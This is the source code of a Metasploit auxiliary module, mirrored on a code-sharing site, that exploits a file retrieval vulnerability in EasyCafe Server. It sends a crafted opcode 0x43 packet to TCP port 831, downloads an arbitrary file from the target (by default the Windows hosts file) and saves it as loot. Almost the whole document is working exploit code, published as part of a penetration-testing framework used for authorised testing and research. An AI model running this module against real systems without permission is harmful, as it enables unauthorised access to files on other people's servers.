Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
25259 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'EasyCafe Server Remote File Access',

16
        'Description' => %q{

17
          This module exploits a file retrieval vulnerability in

18
          EasyCafe Server. The vulnerability can be triggered by

19
          sending a specially crafted packet (opcode 0x43) to the

20
          831/TCP port.

21
          This module has been successfully tested on EasyCafe Server

22
          version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3

23
          and Windows 7 SP1.

24
          Note that the server will throw a popup messagebox if the

25
          specified file does not exist.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'R-73eN', # Vulnerability Discovery

30
          'bcoles' # Metasploit module

31
        ],

32
        'References' => [

33
          [ 'CVE', '2025-34119' ],

34
          [ 'EDB', '39102' ]

35
        ],

36
        'Notes' => {

37
          'Reliability' => UNKNOWN_RELIABILITY,

38
          'Stability' => UNKNOWN_STABILITY,

39
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

40
        }

41
      )

42
    )

43


44
    register_options(

45
      [

46
        Opt::RPORT(831),

47
        OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])

48
      ]

49
    )

50
  end

51


52
  def get_file

53
    res = sock.get_once

54
    unless res

55
      print_error("Unable to retrieve file due to a timeout.")

56
      return

57
    end

58


59
    unless res.length == 261

60
      print_error("Received a response of an invalid size.")

61
      return

62
    end

63


64
    file_size = res.unpack('@256V')[0]

65
    contents = ''

66
    while contents.length < file_size

67
      contents << sock.get_once

68
    end

69


70
    print_good("File retrieved successfully (#{contents.length} bytes)!")

71
    contents

72
  end

73


74
  def run_host(ip)

75
    file_path = datastore['FILEPATH']

76
    if file_path.length > 67

77
      print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")

78
      return

79
    end

80


81
    packet = "\x43"

82
    packet << file_path

83
    packet << "\x00" * (255 - file_path.length)

84
    packet << "\x01\x00\x00\x00\x01"

85


86
    vprint_status("Sending request (#{packet.length} bytes)")

87
    connect

88
    sock.put(packet)

89


90
    contents = get_file

91
    disconnect

92
    return if contents.nil?

93


94
    path = store_loot(

95
      'easycafe_server',

96
      'application/octet-stream',

97
      ip,

98
      contents,

99
      File.basename(file_path)

100
    )

101
    print_status("File saved in: #{path}")

102
  end

103
end

104


105